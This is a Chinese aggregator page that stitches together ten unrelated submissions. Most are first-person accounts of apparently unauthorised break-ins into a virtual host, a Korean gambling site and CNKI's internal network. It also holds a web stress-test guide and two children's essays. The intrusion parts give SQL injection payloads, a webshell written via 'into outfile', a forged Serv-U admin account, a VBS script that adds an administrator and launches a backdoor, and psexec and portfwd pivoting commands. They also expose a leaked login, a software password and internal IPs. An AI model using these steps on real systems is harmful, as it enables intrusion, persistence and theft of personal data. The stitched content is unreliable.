记一次完整的WEB服务器渗透测试
“muteguitar”通过精心收集,向本站投稿了10篇记一次完整的WEB服务器渗透测试,下面是小编给大家整理后的记一次完整的WEB服务器渗透测试,欢迎大家借鉴与参考,希望对大家有所帮助。
篇1:记一次完整的WEB服务器渗透测试
渗透测试是最能直接的反映系统的安全性的一种手段了,
记一次完整的WEB服务器渗透测试
,
现整理了前段时间进行的一次渗透测试的笔记,整个过程中所使用的工具和思路都比较简单,本文也正是为了您的系统不被这些简单的东西所击败而作 此次渗透测试的已知条件只有一个:目标IP地址211.***.***.11
篇2:记一次渗透虚拟主机服务器
前几天听一树说了惊云下载系统的漏洞
问题文件出在admin/user.asp
提交
www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
就相当于:
select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’“
利用access注入得到管理员密码
上面有一个文件upfile.htm
手工利用了下动网的upfile.asp漏洞
就成功上传了个asp木马
然后那个虚拟主机的c,d盘是NTFS分区
不能访问E盘装着servu,php,webmail,
F盘是虚拟站点
servu安装目录可写~
本来打算替换他servu文件的~但是觉的太麻烦
还容易让管理员怀疑
想起servu的本地提升来了
在自己计算机上装了个servu
添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里看ServUDaemon.ini
格式是这样的
[GLOBAL]
Version=5.0.0.11
LocalSetupPassword=072C6310580D5C07170A7E3E
LocalSetupPortNo=60628
ProcessID=972
[DOMAINS]
Domain1=192.168.0.102||21|向导产生域|1|0|0
Domain2=192.168.0.102||2121|123|2|0|0
[Domain1]
User1=www|1|0
[USER=www|1]
Password=ih0C292E1AC82920B7F384007F302A1296
HomeDir=D:\xiaoben
TimeOut=600
Note1=”Wizard generated account“
Access1=D:\xiaoben|RLPWAMCD
SKEYValues=
[Domain2]
User1=rover|1|0
User2=123|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
[USER=123|2]
Password=kv3F6EED70340AD1478ADF95963A07FD00
HomeDir=c:\
TimeOut=600
Access1=C:\|RWAMLCDP
SKEYValues=
----------------
其中rover用户就是我添加的那个
在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini
访照我本地的INI写进一个用户进去
User1=rover|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
保存~
用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 就应该为windows目录,
记一次渗透虚拟主机服务器
,
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。
提示没有权限~郁闷~
但是我们有对C盘的访问权限了是不~hoho~
把后门(server.exe)传他system32目录
然后写一个VBs教本
set wshshell=createobject (”wscript.shell“)
a=wshshell.run (”cmd.exe /c net user tsinternetuser rover1234 /add“,0)
b=wshshell.run (”cmd.exe /c net localgroup Administrators tsinternetuser /add“,0)
b=wshshell.run (”cmd.exe /c net user tsinternetuser /active:yes“,0)
b=wshshell.run (”cmd.exe /c server.exe“,0)
存为HELP.vbe
这个教本的作用是修改tsinternetuser用户密码为rover1234
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本~
接下来就是等了~
等他登陆~
等了一段时间(看了一部蜘蛛侠的时间吧)~
连接后门~得到admin权限的shell
hoho~
接下来是善后工作了~就不说了
今天心情非常糟~有一些事情压的我喘不过气来
考试的时候当老师面把卷子撕了,然后扬步走了~
妈妈的~过程写的很乱~见谅
篇3:Nginx应用案例:压力测试WEB服务器
在运维工作中,压力测试是一项非常重要的工作,比如在一个网站上线之前,能承受多大访问量、在大访问量情况下性能怎样,这些数据指标好坏将会直接影响用户体验。
但是,在压力测试中存在一个共性,那就是压力测试的结果与实际负载结果不会完全相同,就算压力测试工作做的再好,也不能保证100%和线上性能指标相 同。面对这些问题,我们只能尽量去想方设法去模拟。所以,压力测试非常有必要,有了这些数据,我们就能对自己做维护的平台做到心中有数。
目前较为常见的网站压力测试工具有webbench、ab(apache bench)、tcpcopy、loadrunner
软件名称简介优缺点
webbench由Lionbridge公司开发,主要测试每秒钟请求数和每秒钟数据传输量,同时支持静态、动态、SSL
部署简单,静动态均可测试。适用于小型网站压力测试(单例最多可模拟3万并发)
ab(apache bench)Apache自带的压力测试工具,主要功能用于测试网站每秒钟处理请求个数
多见用于静态压力测试,功能较弱,非专业压力测试工具
tcpcopy基于底层应用请求复制,可转发各种在线请求到测试服务器,具有分布式压力测试功能,所测试数据与实际生产数据较为接近后起之秀,主要用于中大型压力测试,所有基于 tcp的packets均可测试
loadrunner压力测试界的泰斗,可以创建虚拟用户,可以模拟用户真实访问流程从而录制成脚本,其测试结果也最为逼真模拟最为逼真,并可进行独立的单元测试,但是部署配置较为复杂,需要专业人员才可以。
下面,笔者就以webbench为例,来讲解一下网站在上线之前压力测试是如何做的。
安装webbench
#wget home.tiscali.cz/~cz210552/distfiles/webbench-1.5.tar.gz
#tar zxvf webbench-1.5.tar.gz
#cd webbench-1.5
#make && make install
进行压力测试
并发200时
# webbench -c 200 -t 60 blog.luwenju.com/index.php
参数解释:-c为并发数,-t为时间(秒)
Webbench - Simple Web Benchmark 1.5
Copyright (c) Radim Kolar -, GPL Open Source Software.
Benchmarking: GET blog.luwenju.com/index.php
200 clients, running 60 sec.
Speed=1454 pages/min, 2153340 bytes/sec.
Requests: 1454 susceed, 0 failed.
当并发200时,网站访问速度正常
并发800时
#webbench -c 800 -t 60 blog.luwenju.com/index.php
Webbench - Simple Web Benchmark 1.5
Copyright (c) Radim Kolar 1997-2004, GPL Open Source Software.
Benchmarking: GET blog.luwenju.com/index.php
800 clients, running 60 sec.
Speed=1194 pages/min, 2057881 bytes/sec.
Requests: 1185 susceed, 9 failed.
当并发连接为800时,网站访问速度稍慢
并发1600时
#webbench -c 1600 -t 60 blog.luwenju.com/index.php
Webbench - Simple Web Benchmark 1.5
Copyright (c) Radim Kolar 1997-2004, GPL Open Source Software.
Benchmarking: GET blog.luwenju.com/index.php
1600 clients, running 60 sec.
Speed=1256 pages/min, 1983506 bytes/sec.
Requests: 1183 susceed, 73 failed.
当并发连接为1600时,网站访问速度便非常慢了
并发时
#webbench -c 2000 -t 60 blog.luwenju.com/index.php
Webbench - Simple Web Benchmark 1.5
Copyright (c) Radim Kolar 1997-2004, GPL Open Source Software.
Benchmarking: GET blog.luwenju.com/index.php
2000 clients, running 60 sec.
Speed=2154 pages/min, 1968292 bytes/sec.
Requests: 2076 susceed, 78 failed.
当并发2000时,网站便出现“502 Bad Gateway”,由此可见web服务器已无法再处理用户访问请求
总结:
1、压力测试工作应该放到产品上线之前,而不是上线以后
2、测试时尽量跨公网进行,而不是内网
3、测试时并发应当由小逐渐加大,比如并发100时观察一下网站负载是多少、打开是否流程,并发200时又是多少、网站打开缓慢时并发是多少、网站打不开时并发又是多少
4、应尽量进行单元测试,如B2C网站可以着重测试购物车、推广页面等,因为这些页面占整个网站访问量比重较大
篇4:记一次MYSQL4的渗透
某韩国赌博站 先上个截图
操蛋的韩文 一个都看不懂 不是某基友说这是赌博站我都不知道 擦
先大致看一下
先随便点开个页面 测试一下注入点
嗯 看上去好像没有注入点 但是还有另外一种注入检测
欧了 这下就出错了
现在来猜猜列数
好了 共有13个列 现在该收集目标信息了
居然是MYSQL4!这也太奇葩了!
暴库是没有可能了 就跟跑ACC的一样 我字典不够强大 没有国外的字典
但是有ROOT权限 该怎么办呢
根据前面的检测 基本上可以确定魔术引号是没有开的
那就试试写SHELL
有ROOT权限 魔术引号是关闭的 那MYSQL4能不能写文件呢?
为此我特意去找了西来蝈蝈问问
为了证明一下 我决定试一试吧
问题是这个站没有爆物理路径 怎么办呢??
那就随便找个点 使用各种不正规的访问方式 最后终于爆出了一个路径了
然后来试试猥琐的测试
www.xxx.com/board1/board_cntn1.php?postno=34'union all select 1,2,3,4,5,6,0x68656C6C6F206D79206E616D6520697320307841494E492E5151323437383739,8,9,0,11,12,13 into outfile 'c:/html/soju/common/a.php'/*
OK 试试访问一下
测试通过 然后写入一句话 然后就没有然后了
篇5:记一次无聊的渗透
by:以前的1 from:www.wrsky.com/
唉晚上没人陪独自一个,搞了一天的站了累死了。去火狐逛逛,看到一遍关于
――――――――――――――――――――――――――――――――――――
发现一个NB网站
www.帮你改了.net/dvbbs
什么都关掉了,找不到方法进去获得webshell,谁有办法?
――――――――――――――――――――――――――――――
1、文件传不上
2、旁注方式在取得同IP的站点webshell后无法获得机器上的读写权限,另外不知道是否放在同一台机上呢,通过webshell或ASP站长助手我发现同IP的另两站点机器不一样。
对我来说是难题了,不知哪位大峡有办法
――――――――――――――――――――――
试一下默认的数据库能不能下载
――――――――――――――――――
不行
――――――――――――――――――――――――――――
呵呵我全给摘下来了
反正无聊我也去逛逛,”炼金术投资咨询公司“不懂ING,仔细看一下大概是和经济有关的吧,这方面色盲,开工论坛Powered by:DVBBS Ver5.0 Final DVBBS喜欢呵呵,上传不行,不知道是禁用还是删了文件提交UPFILE。ASP没反映。不知道Powered by:DVBBS Ver5.0 Final还是什么洞,那个TONGJI。ASP好像是6。0,没办法拿过来试一下。不行,由于学这个不久所以5。0漏洞不太清楚,(去看代码啊),!・#¥%......我去跳楼好吧。郁闷!
数据库也全改了路径,想不去什么办法了。(有点菜呵呵)
回首页看一下注入习惯了搞个‘,晕”数据库出错“有防了,再爆一下数据库晕”数据库出错“晕不给偶看信息啊郁闷(这样的有什么好办法吗?偶不知道,怎么才能看到真正的信息呢?)提交AND 1=1
AND 1=2,呵呵有的搞,
返回不一样,把NBSI挖出来,一通乱猜记的用特征字符哦。哈哈ADMIN喜欢密码账号全出来了怎么看着那么不顺眼呢密码全是这样的jf&jhf8-<8fnc>f不管拿着去试一下,密码错误郁闷,加密了和偶们学校鸟网站一样的猜到密码也是加密的,和MD5差不多,不过MD5是不可逆的。再仔细看看几个账号,还有点规律性,有几个名字和密码是一样长的,会不会名字密码一样呢,呵呵。老天开眼了呵呵,进了后台,逛逛有添加新闻的,上传图片喜欢,郁闷搞了半天就是欺骗不成功。什么文件全给一个扩展名.gif,人生啊!
放弃还是去旁注呢 ?还是猜测一下密码的规律吧,
有一组是这样的:
原文:z u o y a n
密文:{ w r } f t
有经验了一般是ASCI作鬼,
原文:122 117 111 121 97 110
密文:123 119 114 125 102 116
发现规律了吧,不用说了,把所有账号的密码猜测出来,(有什么用啊,进后台又上传不成功)
呵呵我进论坛的时候看到好像和这里有同一个用户,会不会密码一样呢?
渗透还是要有点运气吗?呵呵一样的哦,搞到一个前台管理员的,郁闷后台不对,用任一个个密码,用户名多不行,组合一下也不行,人生啊。唉,看看前台权限,好像有可以利用的,看到一个好东东偶可以上传附近,兴奋ING,抓包修改上传,(为什么不用工具,)我也不知道我就喜欢手工,主要是偶用工具从没成功过,呵呵有点菜呵呵,搞到个SHELL到里面转了一圈晕,WSCRIPT。SHELL删除了不玩了,运行程序不行,迷茫中,没去看了,权限有点变态, 不支持PHP,不知道有没有MYSQL,SERU是有的,不去提升了,累了。谢谢帮偶看完,没什么技术性,见笑了。
有些原因,不好作动画了。
完了。
篇6:记一个简单的渗透测试过程
PS:本人技术很菜,大牛莫怪
朋友发来的一个站,让我帮忙看看,用了一上午时间把主站搞定了,可是主站是提不了权LINUX,而且内网90%都是WINDOWS的服务器,拿LINUX搞WINDOWS各种不爽,况且还是个低权限的,NMAP的各种参数都用不了。又从外网看了下C段,除了主站外对外开了三个WEB服务,俩静态的放弃了,就剩一个2K3+IIS+ASP的站。就他了!
操起各种SCANNER一顿扫,没注入点,找到了后台路径。惆怅了!发现了一个能和管理员留言的地方,于是乎猥琐流XSS盲打后台。管理员也很不负责,M天之后他才登陆。进了后台,发现管理员的密码居然是123456,真想狠狠的抽自己个嘴巴,然后再把手剁了!
进了后台发现了一处上传图片,未果,放弃。又四处逛逛,发现有个上传档案的地方,应该能上传webshell(如图1)。上传了个ASP文件成功了,点了下后台的下载链接居然直接下载了,找不到上传路径。抓包看了下,也不行。
我突然对这个上传产生了一点自己的看法,那就是:MLGB!!
没办法,想着在后台找个注入点读数据,把写在数据库里download的路径读出来,
有的被过滤了,有的加引号报错(图2),MYSQL4的数据库,UNION查询9个字段,但是提示类型不正确CINT,应该是ASP代码里强制加了类型转换。
继续在后台找别的注入点,发现了能正常UNION查询的,搞之。MYSQL4的数据库果断LOAD_FILE。先读IIS的配置文件C:\WINDOWS\system32\inetsrv\MetaBase.xml,得到网站根目录。之后load_file数据库连接文件,在之前的LINUX的SHELL里连,怎么都连不上,纳闷了。猜数据库的表和列,猜到表了,但是死活猜不出保存上传存储路径的列。
没办法,读download.asp,的文件得到如图3.
分析下代码,请注意
strAbsFile = Server.MapPath(”.“) & ”\file\“ & strSNO & trim(rs(”"))
这句。
原来上传的文件保存规则是网站根路径\file\上传文件的ID.后缀。
这样问题就解决了!嗯哼,成功拿到webshell,然后就开始各种猥琐的内网渗透,就不写了。。
因为是上班时间,行文比较流水,请大家见谅。
最后总结一下全文: 是中国的!
篇7:针对知网CNKI一次简单的渗透测试
一个由外网渗透到CNKI内网的过程,因六月有更重要的事情要做,渗透到此为止,已知会忽略,提交权当笔记。^_^
一个由外网渗透到CNKI内网和获取敏感数据的过程。
整个渗透过程大致分为四部分:
一、弱点刺探:打开通向内网之门
一次偶然的机会接触到了CNKI的“大学生论文管理系统”,发现了这个系统的一个注入点。一切从这里开始……
xynu.check.cnki.net/ 用户名为学号,密码为身份证后8位,通过信息搜集获取到了一堆账号,登录一个测试:学号:5151013 密码:12027623
很幸运的是这个注入点数据库账户为DBA、支持多行执行,且可以使用xp_cmdshell/mssqlagent执行命令。
然而非常不幸的是虽然可以执行系统命令,但是经过一番测试,发现服务器不能连接外网,且站库已分离对外网不开放端口。那么要实际控制这台服务器就变的非常困难了,总不能每次都使用这个注入点去做事情。经过考虑,决定从其它方面着手。于是先使用两条语句添加了个sa权限账户备用:
exec master.dbo.sp_addlogin name,passexec master.dbo.sp_addsrvrolemember name,sysadmin
为了缩短渗透时间,就先Google一下看看有没有一些已知漏洞可以方便快速的打入CNKI内网:
经过筛选,找到了两个Struts2命令执行的站点:esafety.cnki.net和www.dangshi.cnki.net:8080,成功上传Webshell后以备后用。
从IP地址可以看到,服务器也处于CNKI的内网中。使用net view命令获取到了工作组中的所有计算机名:
经过比对得知计算机名是和IP对应的,比如IP为10.1.80.201,计算机名就为CNKI-1-80-201。这对下一步的渗透起了很大的作用。
esafety.cnki.net只开放了80端口,而www.dangshi.cnki.net开放了80和8080端口。因为这两个服务器也无法连接外网,所以不能使用reverse_tcp来反弹meterpreter,只能考虑使用bind_tcp的方式。
经过考虑,决定停掉www.dangshi.cnki.net的一个服务80/8080端口来做为bind_Tcp的端口。于是使用Webshell执行iisreset /stop命令来停掉IIS,但结果却出乎意料。IIS并未停止,反而工作于8080端口的Apache却Duang了……因为CNKI内网各服务器之间并未限制各个端口的通迅,所以在esafety.cnki.net上执行以下两条命令来获取www.dangshi.cnki.net(内网IP:10.1.93.14已抓取管理的登录密码)bind_tcp的Meterpreter(已上传PsExec和Bind_Tcp payload到esafety.cnki.net的D:\bak\目录):
psexec -accepteulapsexec \\10.1.93.14 -u Administrator -p 抓到的密码 -c D:\bak\bind.exe -d
连接211.151.247.54(www.dangshi.cnki.net外网IP)的8080端口,成功获取到了Meterpreter。至此内网的大门已经洞开。(后面的一些截图并非是第一时间的;只是为了说明问题和原理后补上来的,所以有一些误差,请不要在意!)
二、内网初探:扫描弱口令、攻击弱点服务、扩大信息收集面
1、构建可快速连接的内网渗透环境
使用Meterpreter和portfwd命令可以方便地转发内网端口到本地:
portfwd add -l 4444 -p 3389 -r 127.0.0.1portfwd add -l 3333 -p 3389 -r 10.1.201.84 (这个是esafety.cnki.net的内网IP)
在10.1.93.14的IIS管理器中发现服务器上还运行着其它站点,于是找一个留下Webshell。这样就不用在10.1.201.84使用psexec来运行bind_tcp payload了,且上传文件会方便很多。
2、扫描一些包含弱口令的服务
由于我使用的网络不稳定且Meterpreter扫描一些服务的弱口令较慢,所以部分扫描任务直接放到了内网服务器上去完成。
可以看到这个网段服务器大部分使用的是IIS,那么扫描一下MSSQL弱口令会如何呢?
下面这个截图:10.1.202.10是之前存在注入点的那个数据服务器,入内网之后轻易便拿到了管理权(数据库中有不少高校老师和学生的信息哦)。上面的Kbase企业管理器连接着同网段的几台数据服务器(密码为空),内含信息没有去查看。
篇幅有限,其它网段同样的扫描就不截图说明了。经过前期简单的扫描,大致获取到了以下几台主机的管理权(仅扫描了10.1.201.0/24和10.1.202.0/24):
从已获得权限的几台服务器的管理密码上能解读什么信息呢?①.可以看到,Administrator的密码都为9位,非常复杂且毫无规律。可以猜测服务器密码一定有一个统一的管理或是分派到各管理员/部门管理,当然也有可能服务器上安装有管理类的软件来负责密码的统一管理工作。这里仅仅是猜想。②.CNKI内网似乎已有人扫描过了,可以看到不同段MSSQL弱口令的服务器已被添加了aa账号(经过辨明这不是管理添加的)。
三、交叉口令验证:通过已有账号信息获取其它服务器管理权
通过下图可以解析交叉口令的验证原理(仅仅一个方面):
通过MSF使用已获得的账号密码信息来对整个网段进行检测:
交叉口令的来源很多,包含已有任何服务的口令。数据库口令、服务器登录口令、FTP口令、远程控制类软件口令(VNC、TeamViewer、Radmin、pcanywhere、向日葵等),其它服务类软件口令等。
验证账号:MI_Viewer 密码:MIOrchid#1 这组账号密码应该是某软件创建的。
交叉验证的工作模式:
四、总结过程查缺补漏
在整个渗透过程中总结是不可少的。成功目标的多少和信息收集的多少成正比。总结整个过程如下:
1、在整个过程中仅仅对10.1.201.0/24和10.1.201.0/24这两个子网做了检测,如果扩大攻击范围是不是可以获取更多服务器的权限?
2、在整个过程中仅仅针对MSSQL、Windows口令做了扫描,如果将扫描对象扩大到每个已知服务是不是可以收获更多?(已发现数个服务器安装了Serv-u、pcanywhere等软件)
3、一些专用软件了解不够,是不是要花些时间也对这些软件加以了解?(数个服务器安装了Kbase且为空口令,对这总数据库不了解就少了一条路)
4、一些备份服务器上留有某些站点的源码,是否应该花些时间来对这些代码做一次审计以便获取现在提供服务的服务器的权限?
5、通过查看某几个服务器的日志,发现有一个共同的IP登录过,是管理吗?知道了管理IP能干些什么呢?
6、内网的一些服务器,发现安全漏洞的机率是不是更高些呢?
附:net view后整理IP如下:
10.0.93.10410.1.0.1010.1.10.110.1.10.1010.1.10.10010.1.10.10110.1.10.10310.1.10.10410.1.10.10510.1.10.10610.1.10.10710.1.10.10810.1.10.10910.1.10.1110.1.10.11010.1.10.11110.1.10.11210.1.10.11310.1.10.11410.1.10.11510.1.10.11610.1.10.11710.1.10.11810.1.10.11910.1.10.1.1.10.12110.1.10.12210.1.10.12310.1.10.12410.1.10.12510.1.10.12610.1.10.12710.1.10.12810.1.10.12910.1.10.1310.1.10.13010.1.10.13210.1.10.13310.1.10.13410.1.10.13610.1.10.13710.1.10.13810.1.10.13910.1.10.1410.1.10.14010.1.10.14110.1.10.14210.1.10.14510.1.10.19810.1.10.210.1.10.2110.1.10.23810.1.10.2810.1.10.310.1.10.3110.1.10.3310.1.10.3510.1.10.3610.1.10.3710.1.10.3910.1.10.410.1.10.4410.1.10.510.1.10.5110.1.10.5310.1.10.5410.1.10.5610.1.10.5710.1.10.5810.1.10.610.1.10.6010.1.10.6110.1.10.6210.1.10.6310.1.10.6510.1.10.6610.1.10.6710.1.10.6810.1.10.710.1.10.7210.1.10.7410.1.10.7610.1.10.7810.1.10.810.1.10.8010.1.10.8210.1.10.8310.1.10.8410.1.10.8510.1.10.8610.1.10.8710.1.10.8810.1.10.8910.1.10.910.1.10.9010.1.10.9110.1.10.9210.1.10.9610.1.10.9710.1.10.9910.1.11.1010.1.11.1210.1.11.2010.1.11.20110.1.11.0.1.11.2110.1.11.2210.1.11.2310.1.11.2410.1.11.2510.1.11.2610.1.11.2710.1.11.2810.1.11.2910.1.11.3010.1.11.3110.1.110.110.1.110.1010.1.110.10010.1.110.1110.1.110.13410.1.110.1710.1.110.1810.1.110.1910.1.110.2010.1.110.20110.1.110.20210.1.110.20310.1.110.20410.1.110.20510.1.110.20610.1.110.20710.1.110.20810.1.110.20910.1.110.21010.1.110.21110.1.110.21210.1.110.21310.1.110.21410.1.110.21510.1.110.21610.1.110.21710.1.110.21810.1.110.21910.1.110.22010.1.110.22110.1.110.22210.1.110.22310.1.110.22410.1.110.22510.1.110.22610.1.110.2410.1.110.2810.1.110.3810.1.110.3910.1.110.5910.1.110.6110.1.110.6210.1.110.6310.1.110.6410.1.110.6510.1.110.6710.1.110.6810.1.110.6910.1.110.7010.1.110.7110.1.110.7210.1.110.7310.1.110.7410.1.110.8010.1.111.00910.1.111.110.1.111.10010.1.111.10110.1.111.10210.1.111.10310.1.111.10410.1.111.10510.1.111.10810.1.111.11310.1.111.210.1.111.2610.1.111.2710.1.111.2810.1.111.2910.1.111.310.1.111.3010.1.111.3110.1.111.410.1.111.510.1.111.5110.1.111.5210.1.111.5410.1.111.5910.1.111.6110.1.111.6210.1.111.810.1.111.9810.1.112.110.1.112.1010.1.112.1110.1.112.1210.1.112.1310.1.112.1410.1.112.1510.1.112.1610.1.112.1710.1.112.1810.1.112.1910.1.112.310.1.12.1110.1.12.1210.1.12.1310.1.12.1510.1.12.1810.1.12.1910.1.12.2010.1.12.2210.1.12.2310.1.12.2410.1.12.2510.1.12.2610.1.12.2810.1.12.2910.1.12.310.1.12.3010.1.12.3110.1.12.3210.1.12.3410.1.12.3510.1.12.3710.1.12.3810.1.12.3910.1.12.410.1.12.4010.1.12.510.1.12.5110.1.12.5210.1.12.5310.1.12.5410.1.12.610.1.12.710.1.12.810.1.12.910.1.120.12410.1.120.15110.1.120.18010.1.120.18210.1.120.18310.1.120.20110.1.120.20210.1.120.20310.1.120.20410.1.120.20510.1.120.20610.1.120.20710.1.120.20810.1.120.20910.1.120.21010.1.120.21110.1.120.21210.1.120.21310.1.120.21410.1.120.21510.1.120.21610.1.120.21710.1.120.21810.1.120.21910.1.120.22010.1.120.22110.1.120.22210.1.120.22710.1.120.22810.1.120.23810.1.120.24010.1.120.25110.1.121.1910.1.121.8110.1.121.9410.1.122.10110.1.122.10410.1.122.11210.1.122.11410.1.122.11510.1.122.12010.1.122.12310.1.122.20110.1.122.20210.1.123.10110.1.123.10210.1.123.20110.1.123.20210.1.123.21610.1.123.21710.1.123.23110.1.123.23210.1.123.24410.1.123.24510.1.123.3110.1.125.10110.1.125.15410.1.128.10110.1.128.10210.1.129.10110.1.129.10210.1.16.20110.1.16.20210.1.16.20310.1.16.20410.1.16.20510.1.180.4410.1.20.210.1.20.20110.1.201.110.1.201.10010.1.201.10910.1.201.1110.1.201.11010.1.201.11110.1.201.11210.1.201.11310.1.201.11410.1.201.11610.1.201.12210.1.201.12310.1.201.12410.1.201.12510.1.201.12610.1.201.12910.1.201.13010.1.201.13110.1.201.13210.1.201.13310.1.201.13410.1.201.13510.1.201.13710.1.201.13810.1.201.13910.1.201.14010.1.201.1510.1.201.15510.1.201.15710.1.201.15910.1.201.1610.1.201.16210.1.201.16310.1.201.16410.1.201.16510.1.201.16810.1.201.1710.1.201.17110.1.201.17210.1.201.18910.1.201.210.1.201.20110.1.201.2310.1.201.23610.1.201.23710.1.201.310.1.201.3010.1.201.3110.1.201.3310.1.201.3510.1.201.3610.1.201.3710.1.201.3810.1.201.410.1.201.4010.1.201.4210.1.201.4310.1.201.510.1.201.5210.1.201.5410.1.201.5710.1.201.610.1.201.6710.1.201.6810.1.201.710.1.201.7110.1.201.7210.1.201.7410.1.201.810.1.201.8010.1.201.8410.1.201.8710.1.201.910.1.201.9110.1.202.1010.1.202.10210.1.202.10510.1.202.10610.1.202.10710.1.202.10810.1.202.11010.1.202.11110.1.202.11210.1.202.11310.1.202.11610.1.202.11710.1.202.11810.1.202.11910.1.202.1210.1.202.12010.1.202.12110.1.202.12210.1.202.12310.1.202.12410.1.202.12510.1.202.1810.1.202.1910.1.202.19010.1.202.19110.1.202.19910.1.202.20210.1.202.20510.1.202.20610.1.202.20710.1.202.21310.1.202.21910.1.202.22010.1.202.22110.1.202.22210.1.202.23510.1.202.23710.1.202.23810.1.202.23910.1.202.24010.1.202.24210.1.202.24310.1.202.24410.1.202.2910.1.202.3210.1.202.3310.1.202.3410.1.202.3510.1.202.3610.1.202.3710.1.202.3810.1.202.3910.1.202.4010.1.202.4110.1.202.4210.1.202.4310.1.202.4510.1.202.4710.1.202.4810.1.202.5010.1.202.5110.1.202.6010.1.202.6110.1.202.7110.1.202.9910.1.203.1110.1.203.210.1.203.310.1.203.810.1.60.10910.1.8.310.1.8.410.1.8.510.1.8.610.1.8.710.1.8.810.1.80.110.1.80.1010.1.80.1110.1.80.11010.1.80.1210.1.80.210.1.80.20110.1.80.20210.1.80.310.1.80.3810.1.80.410.1.88.1010.1.88.10210.1.88.18310.1.88.2110.1.88.2210.1.9.110.1.9.1010.1.9.1110.1.9.210.1.9.310.1.9.510.1.9.610.1.96.110.1.96.210.1.99.12410.1.99.14010.10.1.20.2210.10.247.42
解决方案:
全面检查
清除后门
篇8:户外物理渗透:终端机,客户端的web测试思路
现在的客户端界面越做越好看了,很多用到了web技术,轻便、界面炫、更新快,但是这样web的缺点也就出来了,就是不稳定,容易受用户等因素影响,
因为很多客户端web是内嵌的,内部通信,所以很多对安全的考虑就很少,漏洞亦较多。在此,我想跟大家分享一下客户端的web测试思路,让大家找到更多的高质量漏洞。
首先打开一个客户端界面,如腾讯的群介绍界面。
方法一:测试F5键。大家都知道F5是刷新键,按f5测试界面是否全部或部分刷新,如果刷新,很大的可能就是嵌入的web。
方法二:测试右键。网页自己特有的右键,如果出现,则可判定是web。
方法三:测试拖曳,
可以点一个图片或一段文字到某个位置,如桌面,浏览器址栏等,如果能拖曳成功,很大可能是web。拖曳操作在测试触屏客户端时最有效。如ATM机、机票终端等。如中国银行XTM
方法四:测试Ctrl+A。如果能全选,那就再Ctrl+C。之后打开一个富文本编辑器,如在线编辑器,如kindeditor.net/demo.php,然后Ctrl+V,再在源码模式查看即可。
方法五:打开burpsuit,直接测试。这个是最准确。得到了地址,就是常规web了,同时可以发现很多内部接口。
因该说上面的五种方法是自己一次次在实践中总结到的,现在看来很简单,但当你发现一种新方法时,总会有一批漏网之鱼向你游来,收获之喜只有自己知道。
求更多思路。
篇9: 记一次体能测试作文
今天我们进行了体能测试,有跑步、仰卧起坐、跳绳、和肺活量四项。
我们先进行的是跑步,我们要跑50米,这对我来说都是小菜一碟,可是到我要跑的时候,心里仍然怕自己跟不上别人。当裁判手中的红旗落下时,心里非常担心。不过我以前的训练还是还是没有白练,在我们一组中,我是第一名跑了8秒93。这个数字虽然在你们眼中不是太好,但在我眼里,这是一种骄傲。
我们下一个测的是仰卧起坐。裁判的哨声一响。只见别人抱着头开始做仰卧起坐,我只见我两边的人不抱头,把手伸到大腿跟那儿,做得非常快。我边做边想:既然是体能检测就要是真实的成绩,如果以后都这样作弊,那要体能检测还有什么用呢。过了半分钟我便开始了冲刺,从原来的37做到了59下。上一年的体育检测我仰卧起坐做了46下,这一次做了59下进步了不少。虽然进步了不少但是这样的结果我只能打99分,如果打100分的话就没有进步的空间了,99分说明做得还不够完美,有进步的余地。
到了下午,我们就开始做跳绳测试了。我们先自己练一会儿,等别的班测试完了我们再测试。终于别的班测试完了,我们先分成两队,一队查数,一队跳绳,我们那一队是先跳的'。开始了我们都开始跳,我们跳了一会儿,我两边的人都失败了几次,而我一次也没有失败。直到跳到40多下的时候,我不小心被绊了一下。绳子抽到腿上的时候非常疼。但我们都要忍着跳完了,我们身上几乎都有一道道红红的痕迹。我跳绳跳了100下,比以前还退步了,所以以后只要有时间我都会练一练。
最后一项就是测肺活量了,我们排好队,来到后操场,只见同学们深吸一口气,用嘴对着吹口使劲吹,知道吹不动的时候,仪器上就会显示出肺活量,有的达3000多毫升,轮到我时,我憋足了劲儿,用尽全身力气开始吹气,谁知仅有毫升多一点儿,我有些失望,不过我已经尽力了。看来我还需要加强锻炼呀!
这短暂的一天结束了,虽然我很累,但我的成绩还算可以。以后我一定坚持锻炼身体,让体能比以前更好!
篇10: 记一次体能测试作文
为什么跑800米也算在体能测试里面了啊!正站在旁道上等待跑步的我,抱怨起来,想起上一次跑步时我喉咙出血这次又要跑我就害怕,想起了上次初中有人跑步猝死的事件!好可怕!那如果我猝死了怎么办?我的肚子又开始隐隐作痛起来。
“预备――跑!”那个初中的体育老师刚发号施令,我就想起了上次跑步在最后超过我的诗诗对我说的话:第一圈先慢慢跑,保存体力,到最后一圈的时候冲刺,这样,你的名次就很靠前了。虽然那只是她随随便便说的话,可我却记得牢牢的。
看着一个一个人从我身后闪了过去,可我依然是乌龟速。“呼、呼、呼、呼”我的喉咙里发出一种很怪的声音。我跑完了第一圈,准备加速的时候,那怪声音不允许我加速。我的喉咙好难受啊!我正在上气不接下气的跑着,我快要死了!我感慨道。
